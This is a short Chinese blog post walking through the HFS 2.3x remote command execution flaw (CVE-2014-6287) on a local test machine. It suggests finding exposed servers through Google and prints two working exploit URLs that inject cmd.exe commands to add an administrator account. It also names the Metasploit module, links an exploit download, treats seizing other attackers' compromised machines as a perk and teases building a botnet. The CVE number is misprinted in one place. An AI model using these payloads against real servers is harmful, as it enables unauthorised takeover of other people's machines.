标签:黑客 肉鸡 cve2014-6287 hfs 远程命令
去年HFS 2.3x 远程命令执行让很多人遭殃了,尤其是一部分黑客,因为很多批量养鸡的黑客都爱用它,于是乎,辛辛苦苦抓的肉鸡就与人分享了。我们分析漏洞得知由于正则表达式的问题,导致了远程代码的执行。
下面我们来本地测试一下这个漏洞的威力,为什么过了大半年还提它?因为今天随便搜了一下,用这个版本的国内还有很多,涉及到部分“抓鸡黑客”(现在还在用这个版本的估计是小菜),学校等。有趣的是,用hfs的服务器一般都开启了3389,罪恶啊。如下图。
google上可以搜到更多的主机。
随便测试几个,大部分开启了3389端口。导致服务器非常不安全。
下面我们在本地虚拟机进行测试,模拟一个“抓鸡黑客”的主机。访问目标网址,发现里面有一个muma.exe,一般是用来挂网马用的。该实例由真实案例改编。
然后利用下面的exp,即可在目标主机上添加管理员账户,然后远程登陆。
http://192.168.72.144:8080/?search==%00{.exec|cmd.exe /c net user zerosecurity 12345 /add.}
http://192.168.72.144:8080/?search==%00{.exec|cmd.exe /c net localgroup administrators zerosecurity /add.}
Tip:有些版本search前面没有?,使用时自己试一下搜索框即可。
登陆远程桌面后可以看到,查看管理员账户成功添加。
同时我们可以看到,该“黑客”的肉鸡也沦陷到我们手上。
metasploit也有对应的exp模块,这里不细说,有兴趣的朋友可以自己尝试一下。
利用模块:exploit/windows/http/rejetto_hfs_exec
影响版本: HFS 2.37
CVE: CVE-2014-62876
触发平台:windows
EXP下载:点我点我
什么?你也想打造自己的养鸡场?以后再说咯~
本文出自 “夜行者” 博客,请务必保留此出处http://zerosecurity.blog.51cto.com/9913090/1617417
回顾HFS 2.3x 远程命令执行,抓鸡黑客的“末日”(CVE2014-6287)
标签:黑客 肉鸡 cve2014-6287 hfs 远程命令
原文地址:http://zerosecurity.blog.51cto.com/9913090/1617417
